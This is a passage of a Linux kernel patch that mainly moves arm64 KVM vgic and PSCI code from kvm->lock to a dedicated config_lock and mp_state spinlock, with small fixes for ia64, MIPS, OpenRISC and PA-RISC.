+@@ -108,7 +113,9 @@ static unsigned long kvm_psci_vcpu_on(struct kvm_vcpu *source_vcpu)
+ 	vcpu->arch.mp_state.mp_state = KVM_MP_STATE_RUNNABLE;
+ 	kvm_vcpu_wake_up(vcpu);
+ 
+-	return PSCI_RET_SUCCESS;
++out_unlock:
++	spin_unlock(&vcpu->arch.mp_state_lock);
++	return ret;
+ }
+ 
+ static unsigned long kvm_psci_vcpu_affinity_info(struct kvm_vcpu *vcpu)
+@@ -168,8 +175,11 @@ static void kvm_prepare_system_event(struct kvm_vcpu *vcpu, u32 type, u64 flags)
+ 	 * after this call is handled and before the VCPUs have been
+ 	 * re-initialized.
+ 	 */
+-	kvm_for_each_vcpu(i, tmp, vcpu->kvm)
+-		tmp->arch.mp_state.mp_state = KVM_MP_STATE_STOPPED;
++	kvm_for_each_vcpu(i, tmp, vcpu->kvm) {
++		spin_lock(&tmp->arch.mp_state_lock);
++		WRITE_ONCE(tmp->arch.mp_state.mp_state, KVM_MP_STATE_STOPPED);
++		spin_unlock(&tmp->arch.mp_state_lock);
++	}
+ 	kvm_make_all_cpus_request(vcpu->kvm, KVM_REQ_SLEEP);
+ 
+ 	memset(&vcpu->run->system_event, 0, sizeof(vcpu->run->system_event));
+@@ -229,7 +239,6 @@ static unsigned long kvm_psci_check_allowed_function(struct kvm_vcpu *vcpu, u32
+ 
+ static int kvm_psci_0_2_call(struct kvm_vcpu *vcpu)
+ {
+-	struct kvm *kvm = vcpu->kvm;
+ 	u32 psci_fn = smccc_get_function(vcpu);
+ 	unsigned long val;
+ 	int ret = 1;
+@@ -254,9 +263,7 @@ static int kvm_psci_0_2_call(struct kvm_vcpu *vcpu)
+ 		kvm_psci_narrow_to_32bit(vcpu);
+ 		fallthrough;
+ 	case PSCI_0_2_FN64_CPU_ON:
+-		mutex_lock(&kvm->lock);
+ 		val = kvm_psci_vcpu_on(vcpu);
+-		mutex_unlock(&kvm->lock);
+ 		break;
+ 	case PSCI_0_2_FN_AFFINITY_INFO:
+ 		kvm_psci_narrow_to_32bit(vcpu);
+@@ -395,7 +402,6 @@ static int kvm_psci_1_x_call(struct kvm_vcpu *vcpu, u32 minor)
+ 
+ static int kvm_psci_0_1_call(struct kvm_vcpu *vcpu)
+ {
+-	struct kvm *kvm = vcpu->kvm;
+ 	u32 psci_fn = smccc_get_function(vcpu);
+ 	unsigned long val;
+ 
+@@ -405,9 +411,7 @@ static int kvm_psci_0_1_call(struct kvm_vcpu *vcpu)
+ 		val = PSCI_RET_SUCCESS;
+ 		break;
+ 	case KVM_PSCI_FN_CPU_ON:
+-		mutex_lock(&kvm->lock);
+ 		val = kvm_psci_vcpu_on(vcpu);
+-		mutex_unlock(&kvm->lock);
+ 		break;
+ 	default:
+ 		val = PSCI_RET_NOT_SUPPORTED;
+diff --git a/arch/arm64/kvm/reset.c b/arch/arm64/kvm/reset.c
+index 5ae18472205a9..f9d070473614e 100644
+--- a/arch/arm64/kvm/reset.c
++++ b/arch/arm64/kvm/reset.c
+@@ -200,7 +200,7 @@ static int kvm_set_vm_width(struct kvm_vcpu *vcpu)
+ 
+ 	is32bit = vcpu_has_feature(vcpu, KVM_ARM_VCPU_EL1_32BIT);
+ 
+-	lockdep_assert_held(&kvm->lock);
++	lockdep_assert_held(&kvm->arch.config_lock);
+ 
+ 	if (test_bit(KVM_ARCH_FLAG_REG_WIDTH_CONFIGURED, &kvm->arch.flags)) {
+ 		/*
+@@ -253,17 +253,18 @@ int kvm_reset_vcpu(struct kvm_vcpu *vcpu)
+ 	bool loaded;
+ 	u32 pstate;
+ 
+-	mutex_lock(&vcpu->kvm->lock);
++	mutex_lock(&vcpu->kvm->arch.config_lock);
+ 	ret = kvm_set_vm_width(vcpu);
+-	if (!ret) {
+-		reset_state = vcpu->arch.reset_state;
+-		WRITE_ONCE(vcpu->arch.reset_state.reset, false);
+-	}
+-	mutex_unlock(&vcpu->kvm->lock);
++	mutex_unlock(&vcpu->kvm->arch.config_lock);
+ 
+ 	if (ret)
+ 		return ret;
+ 
++	spin_lock(&vcpu->arch.mp_state_lock);
++	reset_state = vcpu->arch.reset_state;
++	vcpu->arch.reset_state.reset = false;
++	spin_unlock(&vcpu->arch.mp_state_lock);
++
+ 	/* Reset PMU outside of the non-preemptible section */
+ 	kvm_pmu_vcpu_reset(vcpu);
+ 
+diff --git a/arch/arm64/kvm/vgic/vgic-debug.c b/arch/arm64/kvm/vgic/vgic-debug.c
+index 78cde687383ca..07aa0437125a6 100644
+--- a/arch/arm64/kvm/vgic/vgic-debug.c
++++ b/arch/arm64/kvm/vgic/vgic-debug.c
+@@ -85,7 +85,7 @@ static void *vgic_debug_start(struct seq_file *s, loff_t *pos)
+ 	struct kvm *kvm = s->private;
+ 	struct vgic_state_iter *iter;
+ 
+-	mutex_lock(&kvm->lock);
++	mutex_lock(&kvm->arch.config_lock);
+ 	iter = kvm->arch.vgic.iter;
+ 	if (iter) {
+ 		iter = ERR_PTR(-EBUSY);
+@@ -104,7 +104,7 @@ static void *vgic_debug_start(struct seq_file *s, loff_t *pos)
+ 	if (end_of_vgic(iter))
+ 		iter = NULL;
+ out:
+-	mutex_unlock(&kvm->lock);
++	mutex_unlock(&kvm->arch.config_lock);
+ 	return iter;
+ }
+ 
+@@ -132,12 +132,12 @@ static void vgic_debug_stop(struct seq_file *s, void *v)
+ 	if (IS_ERR(v))
+ 		return;
+ 
+-	mutex_lock(&kvm->lock);
++	mutex_lock(&kvm->arch.config_lock);
+ 	iter = kvm->arch.vgic.iter;
+ 	kfree(iter->lpi_array);
+ 	kfree(iter);
+ 	kvm->arch.vgic.iter = NULL;
+-	mutex_unlock(&kvm->lock);
++	mutex_unlock(&kvm->arch.config_lock);
+ }
+ 
+ static void print_dist_state(struct seq_file *s, struct vgic_dist *dist)
+diff --git a/arch/arm64/kvm/vgic/vgic-init.c b/arch/arm64/kvm/vgic/vgic-init.c
+index f6d4f4052555c..8c1d2d7128db6 100644
+--- a/arch/arm64/kvm/vgic/vgic-init.c
++++ b/arch/arm64/kvm/vgic/vgic-init.c
+@@ -74,9 +74,6 @@ int kvm_vgic_create(struct kvm *kvm, u32 type)
+ 	unsigned long i;
+ 	int ret;
+ 
+-	if (irqchip_in_kernel(kvm))
+-		return -EEXIST;
+-
+ 	/*
+ 	 * This function is also called by the KVM_CREATE_IRQCHIP handler,
+ 	 * which had no chance yet to check the availability of the GICv2
+@@ -87,10 +84,20 @@ int kvm_vgic_create(struct kvm *kvm, u32 type)
+ 		!kvm_vgic_global_state.can_emulate_gicv2)
+ 		return -ENODEV;
+ 
++	/* Must be held to avoid race with vCPU creation */
++	lockdep_assert_held(&kvm->lock);
++
+ 	ret = -EBUSY;
+ 	if (!lock_all_vcpus(kvm))
+ 		return ret;
+ 
++	mutex_lock(&kvm->arch.config_lock);
++
++	if (irqchip_in_kernel(kvm)) {
++		ret = -EEXIST;
++		goto out_unlock;
++	}
++
+ 	kvm_for_each_vcpu(i, vcpu, kvm) {
+ 		if (vcpu_has_run_once(vcpu))
+ 			goto out_unlock;
+@@ -118,6 +125,7 @@ int kvm_vgic_create(struct kvm *kvm, u32 type)
+ 		INIT_LIST_HEAD(&kvm->arch.vgic.rd_regions);
+ 
+ out_unlock:
++	mutex_unlock(&kvm->arch.config_lock);
+ 	unlock_all_vcpus(kvm);
+ 	return ret;
+ }
+@@ -227,9 +235,9 @@ int kvm_vgic_vcpu_init(struct kvm_vcpu *vcpu)
+ 	 * KVM io device for the redistributor that belongs to this VCPU.
+ 	 */
+ 	if (dist->vgic_model == KVM_DEV_TYPE_ARM_VGIC_V3) {
+-		mutex_lock(&vcpu->kvm->lock);
++		mutex_lock(&vcpu->kvm->arch.config_lock);
+ 		ret = vgic_register_redist_iodev(vcpu);
+-		mutex_unlock(&vcpu->kvm->lock);
++		mutex_unlock(&vcpu->kvm->arch.config_lock);
+ 	}
+ 	return ret;
+ }
+@@ -250,7 +258,6 @@ static void kvm_vgic_vcpu_enable(struct kvm_vcpu *vcpu)
+  * The function is generally called when nr_spis has been explicitly set
+  * by the guest through the KVM DEVICE API. If not nr_spis is set to 256.
+  * vgic_initialized() returns true when this function has succeeded.
+- * Must be called with kvm->lock held!
+  */
+ int vgic_init(struct kvm *kvm)
+ {
+@@ -259,6 +266,8 @@ int vgic_init(struct kvm *kvm)
+ 	int ret = 0, i;
+ 	unsigned long idx;
+ 
++	lockdep_assert_held(&kvm->arch.config_lock);
++
+ 	if (vgic_initialized(kvm))
+ 		return 0;
+ 
+@@ -373,12 +382,13 @@ void kvm_vgic_vcpu_destroy(struct kvm_vcpu *vcpu)
+ 	vgic_cpu->rd_iodev.base_addr = VGIC_ADDR_UNDEF;
+ }
+ 
+-/* To be called with kvm->lock held */
+ static void __kvm_vgic_destroy(struct kvm *kvm)
+ {
+ 	struct kvm_vcpu *vcpu;
+ 	unsigned long i;
+ 
++	lockdep_assert_held(&kvm->arch.config_lock);
++
+ 	vgic_debug_destroy(kvm);
+ 
+ 	kvm_for_each_vcpu(i, vcpu, kvm)
+@@ -389,9 +399,9 @@ static void __kvm_vgic_destroy(struct kvm *kvm)
+ 
+ void kvm_vgic_destroy(struct kvm *kvm)
+ {
+-	mutex_lock(&kvm->lock);
++	mutex_lock(&kvm->arch.config_lock);
+ 	__kvm_vgic_destroy(kvm);
+-	mutex_unlock(&kvm->lock);
++	mutex_unlock(&kvm->arch.config_lock);
+ }
+ 
+ /**
+@@ -414,9 +424,9 @@ int vgic_lazy_init(struct kvm *kvm)
+ 		if (kvm->arch.vgic.vgic_model != KVM_DEV_TYPE_ARM_VGIC_V2)
+ 			return -EBUSY;
+ 
+-		mutex_lock(&kvm->lock);
++		mutex_lock(&kvm->arch.config_lock);
+ 		ret = vgic_init(kvm);
+-		mutex_unlock(&kvm->lock);
++		mutex_unlock(&kvm->arch.config_lock);
+ 	}
+ 
+ 	return ret;
+@@ -441,7 +451,7 @@ int kvm_vgic_map_resources(struct kvm *kvm)
+ 	if (likely(vgic_ready(kvm)))
+ 		return 0;
+ 
+-	mutex_lock(&kvm->lock);
++	mutex_lock(&kvm->arch.config_lock);
+ 	if (vgic_ready(kvm))
+ 		goto out;
+ 
+@@ -459,7 +469,7 @@ int kvm_vgic_map_resources(struct kvm *kvm)
+ 		dist->ready = true;
+ 
+ out:
+-	mutex_unlock(&kvm->lock);
++	mutex_unlock(&kvm->arch.config_lock);
+ 	return ret;
+ }
+ 
+diff --git a/arch/arm64/kvm/vgic/vgic-its.c b/arch/arm64/kvm/vgic/vgic-its.c
+index 733b53055f976..c9a03033d5077 100644
+--- a/arch/arm64/kvm/vgic/vgic-its.c
++++ b/arch/arm64/kvm/vgic/vgic-its.c
+@@ -1958,6 +1958,16 @@ static int vgic_its_create(struct kvm_device *dev, u32 type)
+ 	mutex_init(&its->its_lock);
+ 	mutex_init(&its->cmd_lock);
+ 
++	/* Yep, even more trickery for lock ordering... */
++#ifdef CONFIG_LOCKDEP
++	mutex_lock(&dev->kvm->arch.config_lock);
++	mutex_lock(&its->cmd_lock);
++	mutex_lock(&its->its_lock);
++	mutex_unlock(&its->its_lock);
++	mutex_unlock(&its->cmd_lock);
++	mutex_unlock(&dev->kvm->arch.config_lock);
++#endif
++
+ 	its->vgic_its_base = VGIC_ADDR_UNDEF;
+ 
+ 	INIT_LIST_HEAD(&its->device_list);
+@@ -2045,6 +2055,13 @@ static int vgic_its_attr_regs_access(struct kvm_device *dev,
+ 
+ 	mutex_lock(&dev->kvm->lock);
+ 
++	if (!lock_all_vcpus(dev->kvm)) {
++		mutex_unlock(&dev->kvm->lock);
++		return -EBUSY;
++	}
++
++	mutex_lock(&dev->kvm->arch.config_lock);
++
+ 	if (IS_VGIC_ADDR_UNDEF(its->vgic_its_base)) {
+ 		ret = -ENXIO;
+ 		goto out;
+@@ -2058,11 +2075,6 @@ static int vgic_its_attr_regs_access(struct kvm_device *dev,
+ 		goto out;
+ 	}
+ 
+-	if (!lock_all_vcpus(dev->kvm)) {
+-		ret = -EBUSY;
+-		goto out;
+-	}
+-
+ 	addr = its->vgic_its_base + offset;
+ 
+ 	len = region->access_flags & VGIC_ACCESS_64bit ? 8 : 4;
+@@ -2076,8 +2088,9 @@ static int vgic_its_attr_regs_access(struct kvm_device *dev,
+ 	} else {
+ 		*reg = region->its_read(dev->kvm, its, addr, len);
+ 	}
+-	unlock_all_vcpus(dev->kvm);
+ out:
++	mutex_unlock(&dev->kvm->arch.config_lock);
++	unlock_all_vcpus(dev->kvm);
+ 	mutex_unlock(&dev->kvm->lock);
+ 	return ret;
+ }
+@@ -2749,14 +2762,15 @@ static int vgic_its_ctrl(struct kvm *kvm, struct vgic_its *its, u64 attr)
+ 		return 0;
+ 
+ 	mutex_lock(&kvm->lock);
+-	mutex_lock(&its->its_lock);
+ 
+ 	if (!lock_all_vcpus(kvm)) {
+-		mutex_unlock(&its->its_lock);
+ 		mutex_unlock(&kvm->lock);
+ 		return -EBUSY;
+ 	}
+ 
++	mutex_lock(&kvm->arch.config_lock);
++	mutex_lock(&its->its_lock);
++
+ 	switch (attr) {
+ 	case KVM_DEV_ARM_ITS_CTRL_RESET:
+ 		vgic_its_reset(kvm, its);
+@@ -2769,8 +2783,9 @@ static int vgic_its_ctrl(struct kvm *kvm, struct vgic_its *its, u64 attr)
+ 		break;
+ 	}
+ 
+-	unlock_all_vcpus(kvm);
+ 	mutex_unlock(&its->its_lock);
++	mutex_unlock(&kvm->arch.config_lock);
++	unlock_all_vcpus(kvm);
+ 	mutex_unlock(&kvm->lock);
+ 	return ret;
+ }
+diff --git a/arch/arm64/kvm/vgic/vgic-kvm-device.c b/arch/arm64/kvm/vgic/vgic-kvm-device.c
+index edeac2380591f..07e727023deb7 100644
+--- a/arch/arm64/kvm/vgic/vgic-kvm-device.c
++++ b/arch/arm64/kvm/vgic/vgic-kvm-device.c
+@@ -46,7 +46,7 @@ int kvm_set_legacy_vgic_v2_addr(struct kvm *kvm, struct kvm_arm_device_addr *dev
+ 	struct vgic_dist *vgic = &kvm->arch.vgic;
+ 	int r;
+ 
+-	mutex_lock(&kvm->lock);
++	mutex_lock(&kvm->arch.config_lock);
+ 	switch (FIELD_GET(KVM_ARM_DEVICE_TYPE_MASK, dev_addr->id)) {
+ 	case KVM_VGIC_V2_ADDR_TYPE_DIST:
+ 		r = vgic_check_type(kvm, KVM_DEV_TYPE_ARM_VGIC_V2);
+@@ -68,7 +68,7 @@ int kvm_set_legacy_vgic_v2_addr(struct kvm *kvm, struct kvm_arm_device_addr *dev
+ 		r = -ENODEV;
+ 	}
+ 
+-	mutex_unlock(&kvm->lock);
++	mutex_unlock(&kvm->arch.config_lock);
+ 
+ 	return r;
+ }
+@@ -102,7 +102,7 @@ static int kvm_vgic_addr(struct kvm *kvm, struct kvm_device_attr *attr, bool wri
+ 		if (get_user(addr, uaddr))
+ 			return -EFAULT;
+ 
+-	mutex_lock(&kvm->lock);
++	mutex_lock(&kvm->arch.config_lock);
+ 	switch (attr->attr) {
+ 	case KVM_VGIC_V2_ADDR_TYPE_DIST:
+ 		r = vgic_check_type(kvm, KVM_DEV_TYPE_ARM_VGIC_V2);
+@@ -191,7 +191,7 @@ static int kvm_vgic_addr(struct kvm *kvm, struct kvm_device_attr *attr, bool wri
+ 	}
+ 
+ out:
+-	mutex_unlock(&kvm->lock);
++	mutex_unlock(&kvm->arch.config_lock);
+ 
+ 	if (!r && !write)
+ 		r =  put_user(addr, uaddr);
+@@ -227,7 +227,7 @@ static int vgic_set_common_attr(struct kvm_device *dev,
+ 		    (val & 31))
+ 			return -EINVAL;
+ 
+-		mutex_lock(&dev->kvm->lock);
++		mutex_lock(&dev->kvm->arch.config_lock);
+ 
+ 		if (vgic_ready(dev->kvm) || dev->kvm->arch.vgic.nr_spis)
+ 			ret = -EBUSY;
+@@ -235,16 +235,16 @@ static int vgic_set_common_attr(struct kvm_device *dev,
+ 			dev->kvm->arch.vgic.nr_spis =
+ 				val - VGIC_NR_PRIVATE_IRQS;
+ 
+-		mutex_unlock(&dev->kvm->lock);
++		mutex_unlock(&dev->kvm->arch.config_lock);
+ 
+ 		return ret;
+ 	}
+ 	case KVM_DEV_ARM_VGIC_GRP_CTRL: {
+ 		switch (attr->attr) {
+ 		case KVM_DEV_ARM_VGIC_CTRL_INIT:
+-			mutex_lock(&dev->kvm->lock);
++			mutex_lock(&dev->kvm->arch.config_lock);
+ 			r = vgic_init(dev->kvm);
+-			mutex_unlock(&dev->kvm->lock);
++			mutex_unlock(&dev->kvm->arch.config_lock);
+ 			return r;
+ 		case KVM_DEV_ARM_VGIC_SAVE_PENDING_TABLES:
+ 			/*
+@@ -260,7 +260,10 @@ static int vgic_set_common_attr(struct kvm_device *dev,
+ 				mutex_unlock(&dev->kvm->lock);
+ 				return -EBUSY;
+ 			}
++
++			mutex_lock(&dev->kvm->arch.config_lock);
+ 			r = vgic_v3_save_pending_tables(dev->kvm);
++			mutex_unlock(&dev->kvm->arch.config_lock);
+ 			unlock_all_vcpus(dev->kvm);
+ 			mutex_unlock(&dev->kvm->lock);
+ 			return r;
+@@ -411,15 +414,17 @@ static int vgic_v2_attr_regs_access(struct kvm_device *dev,
+ 
+ 	mutex_lock(&dev->kvm->lock);
+ 
++	if (!lock_all_vcpus(dev->kvm)) {
++		mutex_unlock(&dev->kvm->lock);
++		return -EBUSY;
++	}
++
++	mutex_lock(&dev->kvm->arch.config_lock);
++
+ 	ret = vgic_init(dev->kvm);
+ 	if (ret)
+ 		goto out;
+ 
+-	if (!lock_all_vcpus(dev->kvm)) {
+-		ret = -EBUSY;
+-		goto out;
+-	}
+-
+ 	switch (attr->group) {
+ 	case KVM_DEV_ARM_VGIC_GRP_CPU_REGS:
+ 		ret = vgic_v2_cpuif_uaccess(vcpu, is_write, addr, &val);
+@@ -432,8 +437,9 @@ static int vgic_v2_attr_regs_access(struct kvm_device *dev,
+ 		break;
+ 	}
+ 
+-	unlock_all_vcpus(dev->kvm);
+ out:
++	mutex_unlock(&dev->kvm->arch.config_lock);
++	unlock_all_vcpus(dev->kvm);
+ 	mutex_unlock(&dev->kvm->lock);
+ 
+ 	if (!ret && !is_write)
+@@ -569,12 +575,14 @@ static int vgic_v3_attr_regs_access(struct kvm_device *dev,
+ 
+ 	mutex_lock(&dev->kvm->lock);
+ 
+-	if (unlikely(!vgic_initialized(dev->kvm))) {
+-		ret = -EBUSY;
+-		goto out;
++	if (!lock_all_vcpus(dev->kvm)) {
++		mutex_unlock(&dev->kvm->lock);
++		return -EBUSY;
+ 	}
+ 
+-	if (!lock_all_vcpus(dev->kvm)) {
++	mutex_lock(&dev->kvm->arch.config_lock);
++
++	if (unlikely(!vgic_initialized(dev->kvm))) {
+ 		ret = -EBUSY;
+ 		goto out;
+ 	}
+@@ -609,8 +617,9 @@ static int vgic_v3_attr_regs_access(struct kvm_device *dev,
+ 		break;
+ 	}
+ 
+-	unlock_all_vcpus(dev->kvm);
+ out:
++	mutex_unlock(&dev->kvm->arch.config_lock);
++	unlock_all_vcpus(dev->kvm);
+ 	mutex_unlock(&dev->kvm->lock);
+ 
+ 	if (!ret && uaccess && !is_write) {
+diff --git a/arch/arm64/kvm/vgic/vgic-mmio-v3.c b/arch/arm64/kvm/vgic/vgic-mmio-v3.c
+index 91201f7430339..472b18ac92a24 100644
+--- a/arch/arm64/kvm/vgic/vgic-mmio-v3.c
++++ b/arch/arm64/kvm/vgic/vgic-mmio-v3.c
+@@ -111,7 +111,7 @@ static void vgic_mmio_write_v3_misc(struct kvm_vcpu *vcpu,
+ 	case GICD_CTLR: {
+ 		bool was_enabled, is_hwsgi;
+ 
+-		mutex_lock(&vcpu->kvm->lock);
++		mutex_lock(&vcpu->kvm->arch.config_lock);
+ 
+ 		was_enabled = dist->enabled;
+ 		is_hwsgi = dist->nassgireq;
+@@ -139,7 +139,7 @@ static void vgic_mmio_write_v3_misc(struct kvm_vcpu *vcpu,
+ 		else if (!was_enabled && dist->enabled)
+ 			vgic_kick_vcpus(vcpu->kvm);
+ 
+-		mutex_unlock(&vcpu->kvm->lock);
++		mutex_unlock(&vcpu->kvm->arch.config_lock);
+ 		break;
+ 	}
+ 	case GICD_TYPER:
+diff --git a/arch/arm64/kvm/vgic/vgic-mmio.c b/arch/arm64/kvm/vgic/vgic-mmio.c
+index b32d434c1d4a4..a95f99b93dd68 100644
+--- a/arch/arm64/kvm/vgic/vgic-mmio.c
++++ b/arch/arm64/kvm/vgic/vgic-mmio.c
+@@ -527,13 +527,13 @@ unsigned long vgic_mmio_read_active(struct kvm_vcpu *vcpu,
+ 	u32 intid = VGIC_ADDR_TO_INTID(addr, 1);
+ 	u32 val;
+ 
+-	mutex_lock(&vcpu->kvm->lock);
++	mutex_lock(&vcpu->kvm->arch.config_lock);
+ 	vgic_access_active_prepare(vcpu, intid);
+ 
+ 	val = __vgic_mmio_read_active(vcpu, addr, len);
+ 
+ 	vgic_access_active_finish(vcpu, intid);
+-	mutex_unlock(&vcpu->kvm->lock);
++	mutex_unlock(&vcpu->kvm->arch.config_lock);
+ 
+ 	return val;
+ }
+@@ -622,13 +622,13 @@ void vgic_mmio_write_cactive(struct kvm_vcpu *vcpu,
+ {
+ 	u32 intid = VGIC_ADDR_TO_INTID(addr, 1);
+ 
+-	mutex_lock(&vcpu->kvm->lock);
++	mutex_lock(&vcpu->kvm->arch.config_lock);
+ 	vgic_access_active_prepare(vcpu, intid);
+ 
+ 	__vgic_mmio_write_cactive(vcpu, addr, len, val);
+ 
+ 	vgic_access_active_finish(vcpu, intid);
+-	mutex_unlock(&vcpu->kvm->lock);
++	mutex_unlock(&vcpu->kvm->arch.config_lock);
+ }
+ 
+ int vgic_mmio_uaccess_write_cactive(struct kvm_vcpu *vcpu,
+@@ -659,13 +659,13 @@ void vgic_mmio_write_sactive(struct kvm_vcpu *vcpu,
+ {
+ 	u32 intid = VGIC_ADDR_TO_INTID(addr, 1);
+ 
+-	mutex_lock(&vcpu->kvm->lock);
++	mutex_lock(&vcpu->kvm->arch.config_lock);
+ 	vgic_access_active_prepare(vcpu, intid);
+ 
+ 	__vgic_mmio_write_sactive(vcpu, addr, len, val);
+ 
+ 	vgic_access_active_finish(vcpu, intid);
+-	mutex_unlock(&vcpu->kvm->lock);
++	mutex_unlock(&vcpu->kvm->arch.config_lock);
+ }
+ 
+ int vgic_mmio_uaccess_write_sactive(struct kvm_vcpu *vcpu,
+diff --git a/arch/arm64/kvm/vgic/vgic-v4.c b/arch/arm64/kvm/vgic/vgic-v4.c
+index a413718be92b8..3bb0034780605 100644
+--- a/arch/arm64/kvm/vgic/vgic-v4.c
++++ b/arch/arm64/kvm/vgic/vgic-v4.c
+@@ -232,9 +232,8 @@ int vgic_v4_request_vpe_irq(struct kvm_vcpu *vcpu, int irq)
+  * @kvm:	Pointer to the VM being initialized
+  *
+  * We may be called each time a vITS is created, or when the
+- * vgic is initialized. This relies on kvm->lock to be
+- * held. In both cases, the number of vcpus should now be
+- * fixed.
++ * vgic is initialized. In both cases, the number of vcpus
++ * should now be fixed.
+  */
+ int vgic_v4_init(struct kvm *kvm)
+ {
+@@ -243,6 +242,8 @@ int vgic_v4_init(struct kvm *kvm)
+ 	int nr_vcpus, ret;
+ 	unsigned long i;
+ 
++	lockdep_assert_held(&kvm->arch.config_lock);
++
+ 	if (!kvm_vgic_global_state.has_gicv4)
+ 		return 0; /* Nothing to see here... move along. */
+ 
+@@ -309,14 +310,14 @@ int vgic_v4_init(struct kvm *kvm)
+ /**
+  * vgic_v4_teardown - Free the GICv4 data structures
+  * @kvm:	Pointer to the VM being destroyed
+- *
+- * Relies on kvm->lock to be held.
+  */
+ void vgic_v4_teardown(struct kvm *kvm)
+ {
+ 	struct its_vm *its_vm = &kvm->arch.vgic.its_vm;
+ 	int i;
+ 
++	lockdep_assert_held(&kvm->arch.config_lock);
++
+ 	if (!its_vm->vpes)
+ 		return;
+ 
+diff --git a/arch/arm64/kvm/vgic/vgic.c b/arch/arm64/kvm/vgic/vgic.c
+index d97e6080b4217..0a005da83ae64 100644
+--- a/arch/arm64/kvm/vgic/vgic.c
++++ b/arch/arm64/kvm/vgic/vgic.c
+@@ -24,11 +24,13 @@ struct vgic_global kvm_vgic_global_state __ro_after_init = {
+ /*
+  * Locking order is always:
+  * kvm->lock (mutex)
+- *   its->cmd_lock (mutex)
+- *     its->its_lock (mutex)
+- *       vgic_cpu->ap_list_lock		must be taken with IRQs disabled
+- *         kvm->lpi_list_lock		must be taken with IRQs disabled
+- *           vgic_irq->irq_lock		must be taken with IRQs disabled
++ *   vcpu->mutex (mutex)
++ *     kvm->arch.config_lock (mutex)
++ *       its->cmd_lock (mutex)
++ *         its->its_lock (mutex)
++ *           vgic_cpu->ap_list_lock		must be taken with IRQs disabled
++ *             kvm->lpi_list_lock		must be taken with IRQs disabled
++ *               vgic_irq->irq_lock		must be taken with IRQs disabled
+  *
+  * As the ap_list_lock might be taken from the timer interrupt handler,
+  * we have to disable IRQs before taking this lock and everything lower
+diff --git a/arch/ia64/kernel/salinfo.c b/arch/ia64/kernel/salinfo.c
+index bd3ba276e69c3..03b632c568995 100644
+--- a/arch/ia64/kernel/salinfo.c
++++ b/arch/ia64/kernel/salinfo.c
+@@ -581,7 +581,7 @@ static int salinfo_cpu_pre_down(unsigned int cpu)
+  * 'data' contains an integer that corresponds to the feature we're
+  * testing
+  */
+-static int proc_salinfo_show(struct seq_file *m, void *v)
++static int __maybe_unused proc_salinfo_show(struct seq_file *m, void *v)
+ {
+ 	unsigned long data = (unsigned long)v;
+ 	seq_puts(m, (sal_platform_features & data) ? "1\n" : "0\n");
+diff --git a/arch/ia64/mm/contig.c b/arch/ia64/mm/contig.c
+index 24901d8093015..1e9eaa107eb73 100644
+--- a/arch/ia64/mm/contig.c
++++ b/arch/ia64/mm/contig.c
+@@ -77,7 +77,7 @@ skip:
+ 	return __per_cpu_start + __per_cpu_offset[smp_processor_id()];
+ }
+ 
+-static inline void
++static inline __init void
+ alloc_per_cpu_data(void)
+ {
+ 	size_t size = PERCPU_PAGE_SIZE * num_possible_cpus();
+diff --git a/arch/ia64/mm/hugetlbpage.c b/arch/ia64/mm/hugetlbpage.c
+index f993cb36c0626..921db957d2e67 100644
+--- a/arch/ia64/mm/hugetlbpage.c
++++ b/arch/ia64/mm/hugetlbpage.c
+@@ -58,7 +58,7 @@ huge_pte_offset (struct mm_struct *mm, unsigned long addr, unsigned long sz)
+ 
+ 	pgd = pgd_offset(mm, taddr);
+ 	if (pgd_present(*pgd)) {
+-		p4d = p4d_offset(pgd, addr);
++		p4d = p4d_offset(pgd, taddr);
+ 		if (p4d_present(*p4d)) {
+ 			pud = pud_offset(p4d, taddr);
+ 			if (pud_present(*pud)) {
+diff --git a/arch/mips/fw/lib/cmdline.c b/arch/mips/fw/lib/cmdline.c
+index f24cbb4a39b50..892765b742bbc 100644
+--- a/arch/mips/fw/lib/cmdline.c
++++ b/arch/mips/fw/lib/cmdline.c
+@@ -53,7 +53,7 @@ char *fw_getenv(char *envname)
+ {
+ 	char *result = NULL;
+ 
+-	if (_fw_envp != NULL) {
++	if (_fw_envp != NULL && fw_envp(0) != NULL) {
+ 		/*
+ 		 * Return a pointer to the given environment variable.
+ 		 * YAMON uses "name", "value" pairs, while U-Boot uses
+diff --git a/arch/openrisc/kernel/entry.S b/arch/openrisc/kernel/entry.S
+index 54a87bba35caa..a130c4dac48d3 100644
+--- a/arch/openrisc/kernel/entry.S
++++ b/arch/openrisc/kernel/entry.S
+@@ -173,7 +173,6 @@ handler:							;\
+ 	l.sw    PT_GPR28(r1),r28					;\
+ 	l.sw    PT_GPR29(r1),r29					;\
+ 	/* r30 already save */					;\
+-/*        l.sw    PT_GPR30(r1),r30*/					;\
+ 	l.sw    PT_GPR31(r1),r31					;\
+ 	TRACE_IRQS_OFF_ENTRY						;\
+ 	/* Store -1 in orig_gpr11 for non-syscall exceptions */	;\
+@@ -211,9 +210,8 @@ handler:							;\
+ 	l.sw    PT_GPR27(r1),r27					;\
+ 	l.sw    PT_GPR28(r1),r28					;\
+ 	l.sw    PT_GPR29(r1),r29					;\
+-	/* r31 already saved */					;\
+-	l.sw    PT_GPR30(r1),r30					;\
+-/*        l.sw    PT_GPR31(r1),r31	*/				;\
++	/* r30 already saved */						;\
++	l.sw    PT_GPR31(r1),r31					;\
+ 	/* Store -1 in orig_gpr11 for non-syscall exceptions */	;\
+ 	l.addi	r30,r0,-1					;\
+ 	l.sw	PT_ORIG_GPR11(r1),r30				;\
+diff --git a/arch/parisc/kernel/pacache.S b/arch/parisc/kernel/pacache.S
+index 9a0018f1f42cb..541370d145594 100644
+--- a/arch/parisc/kernel/pacache.S
++++ b/arch/parisc/kernel/pacache.S
+@@ -889,6 +889,7 @@ ENDPROC_CFI(flush_icache_page_asm)
+ ENTRY_CFI(flush_kernel_dcache_page_asm)
+ 88:	ldil		L%dcache_stride, %r1
+ 	ldw		R%dcache_stride(%r1), %r23
++	depi_safe	0, 31,PAGE_SHIFT, %r26	/* Clear any offset bits */
+ 
+ #ifdef CONFIG_64BIT
+ 	depdi,z		1, 63-PAGE_SHIFT,1, %r25
+@@ -925,6 +926,7 @@ ENDPROC_CFI(flush_kernel_dcache_page_asm)
+ ENTRY_CFI(purge_kernel_dcache_page_asm)
+ 88:	ldil		L%dcache_stride, %r1
+ 	ldw		R%dcache_stride(%r1), %r23
++	depi_safe	0, 31,PAGE_SHIFT, %r26	/* Clear any offset bits */
+ 
+ #ifdef CONFIG_64BIT
+ 	depdi,z		1, 63-PAGE_SHIFT,1, %r25
+diff --git a/arch/parisc/kernel/real2.S b/arch/parisc/kernel/real2.S
+index 2b16d8d6598f1..c37010a135865 100644
